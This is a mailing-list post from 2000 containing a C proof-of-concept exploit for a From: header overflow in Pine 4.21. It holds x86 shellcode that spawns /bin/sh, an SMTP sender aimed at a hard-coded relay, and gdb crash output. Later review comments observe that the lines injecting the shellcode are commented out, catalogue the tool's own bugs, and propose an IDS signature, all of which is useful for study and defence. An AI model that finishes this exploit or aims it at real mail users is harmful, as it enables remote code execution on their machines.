Re: [PEN-TEST] First step of a pen-test
From: Riley Hassell <riley () SPEAKEASY NET>
Date: Fri, 22 Sep 2000 17:36:47 -0700
/*############## ##### ###### ## # ## # # # # # # # # #
 * PINE Exploit 4.21 [ bTm ]
 *
 * Proof of Concept: Pine 4.21
 * There exists a vulnerability in Pine 4.21 involving the portion of code in
 * charge of peroidically checking email when a pine client is open. Run pine
 * in one window, then send an email to the account owning that session.
 * Switch back over and hit [Control+L] (to check your mail). Woohoo! now open
 * the core up in gdb:
 * #2 0x40084098 in abort () at ../sysdeps/generic/abort.c:139
 * #3 0x817470c in strcpy () at ../sysdeps/generic/strcpy.c:43
 * #4 0x8137f82 in strcpy () at ../sysdeps/generic/strcpy.c:43
 * #5 0x8158760 in strcpy () at ../sysdeps/generic/strcpy.c:43
 * #6 0x40082c28 in __restore () at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
 * #7 0xe7e2bfff in ?? ()
 * Cannot access memory at address 0xe7e2bfff.
 * Oops, my alignment could use some work.
 * Hello's : Mega,Loki,Lamagra,and zen-parse.
 * BTW: this is broken, you have to figure it out on your own how to smuggle
 * the shellcode in. Any real Pentester can get this working fairly quickly.
 * Just be polite, don't forget to say HELO!
 * Arkane [bTm]
 * ######### ### # ## # # ## # # ## # # # # # # # ### ## ## */

/*
 * Review notes on the archive copy.
 *
 * The listing was collapsed onto a few lines by the mailing-list archiver.
 * Statement and line breaks below are reconstructed; in particular which
 * statement each `//` comment swallows is a best reading of the original
 * layout, not something the archive copy proves.
 *
 * What this build does as written: it resolves a hard-coded relay, speaks a
 * minimal SMTP envelope with argv[1] as both sender and recipient, then sends
 * one message whose From: header begins with 700 bytes of 0x41 followed by
 * the contents of a heap buffer that is never initialised (see `exec`).
 * Every line that would copy `shellcode` or a return address into the
 * message is commented out, so the only thing that leaves the machine is an
 * oversized, mostly-constant header.
 *
 * From a defender's side that is also the detectable artefact: a mail
 * gateway or IDS signature keyed on an abnormally long From: header (a run
 * of repeated 0x41 followed by arbitrary bytes) sees this PoC on the wire
 * before any client parses it.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>

/*
 * Meant to hand back the caller's stack pointer through %eax.
 * The function has no return statement, so reading its value is undefined
 * behaviour in C; it relies on the compiler leaving %eax untouched after the
 * asm. Its only call site (`addr = get_sp () - offset;`) is commented out in
 * main(), so this is dead code in this build.
 */
unsigned long get_sp (void) { __asm__ ("mov %esp, %eax"); }

#define ADDRLEN 700   /* bytes of 0x41 placed at the start of the From: header */
#define EXECLEN 1000  /* size of the `exec` heap buffer (never written, see main) */
#define NOP 0x90      /* unused: the two memset(...,0x90,...) calls that used it are commented out */

/*
 * Raw x86 bytes ending in the literal "/bin/sh". The only reference to this
 * array is the commented-out memcpy in main(), so it is never copied into any
 * buffer that is sent.
 */
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Entry point.
 *
 * argv[1]  e-mail address used as both MAIL FROM and RCPT TO.
 * argv[2]  optional integer offset; parsed into `offset` but never used,
 *          because the only consumer (`get_sp () - offset`) is commented out.
 *
 * Exits 0 after sending, 1 on resolve/socket/connect failure, 0 on usage.
 *
 * Defects visible in this block (all in the tool itself, not the target):
 *  - both malloc() results are used unchecked (CERT MEM32-C);
 *  - `mail[100]` and `rcpt[100]` are filled by sprintf() from argv[1] with no
 *    bound, so an address longer than the buffer overflows this program's own
 *    stack; snprintf with sizeof would bound it;
 *  - `exec` is allocated but never written (its memset is commented out), so
 *    the "%s" in the final sprintf reads uninitialised heap memory (UB) and
 *    strlen() of it is unbounded, which can also overflow `data[2500]`;
 *  - `addr` and `i` are assigned/declared but never read;
 *  - send() return values are ignored; a short or failed send is silent;
 *  - `*(u_long *) hp->h_addr` type-puns through an incompatible pointer;
 *    memcpy(&server.sin_addr, hp->h_addr, sizeof server.sin_addr) is the
 *    aliasing-safe form.
 */
int main (int argc, char **argv) {
  struct sockaddr_in server;
  struct hostent *hp;
  int s;
  char helo[100];
  char mail[100];
  char rcpt[100];
  char data[2500];
  char start[20];
  int offset = 0;
  unsigned long addr;
  int i;                   /* unused */
  char *addrs,*exec;

  /* Neither allocation is checked for NULL before use. */
  addrs = (char *) malloc (ADDRLEN);
  exec = (char *) malloc (EXECLEN);

  if(argc < 2) {
    printf(" Usage: %s <Email Address> <offset>\n", argv[0]);
    printf(" \n\n");
    exit(0);
  }
  /* Parsed but has no effect: the only use is in the commented-out line below. */
  if (argc == 3) offset = atoi (argv[2]);

  //addr = get_sp () - offset;
  addr = 0xbfffe7e2; //RH62
  /* `addr` is never read after this point in the live code. */

  /* Fill the header prefix with 0x41; this is the only buffer that is initialised. */
  memset(addrs,0x41,ADDRLEN);
  // for (i = 0; i < ADDRLEN ; i += 4)
  // *(unsigned *) &addrs[i] = addr;
  // memset(exec,0x90,EXECLEN);
  // memset(addrs+195,0x90,5);
  // memcpy (addrs + 200, shellcode, strlen (shellcode));

  /* Relay host is hard-coded; the message is never sent to argv[1]'s own MX. */
  if((hp = gethostbyname ("mail.speakeasy.org")) == NULL) {
    printf ("Could not resolve mail.speakeasy.org.\n");
    exit(1);
  }
  if((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("Error");   /* no newline and no errno text, so the cause is lost */
    exit(1);
  }
  server.sin_family = AF_INET;
  server.sin_port = htons (25);
  /* Type-punned read of the first resolved address (strict-aliasing hazard). */
  server.sin_addr.s_addr = *(u_long *) hp->h_addr;
  bzero (&(server.sin_zero), 8);
  if(connect(s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) {
    printf ("Connection refused\n");   /* reported for any connect() error, not only ECONNREFUSED */
    exit(1);
  }

  /* SMTP envelope. `mail` and `rcpt` are 100 bytes and argv[1] is not bounded. */
  sprintf (helo, "helo test\r\n");
  sprintf (mail, "mail from: %s\r\n",argv[1]);
  send (s, helo, strlen (helo), 0);
  send (s, mail, strlen (mail), 0);
  sprintf (rcpt, "rcpt to: %s\r\n",argv[1]);
  send (s, rcpt, strlen (rcpt), 0);
  sprintf(start,"data\r\n");
  send (s, start, strlen (start), 0);

  /* Printed before the DATA body is actually sent; no server replies are read at any point. */
  fprintf(stderr," Message Sent! \n");

  /*
   * Message body: From: header = 700 x 0x41, then the uninitialised `exec`
   * buffer, then "." to end DATA and QUIT. The "test () test net" form in the
   * literal is most likely the archiver's address munging of the original
   * text; it is kept byte-for-byte here because it is a runtime string.
   * No bound check against sizeof data.
   */
  sprintf(data,"From: %s AAAAAAAA test () test net\r\n%s\r\n.\r\nquit\r\n",addrs,exec);
  send (s, data, strlen (data), 0);
  close (s);
  exit(0);
}

/* ;) Riley Hassell riley () speakeasy org */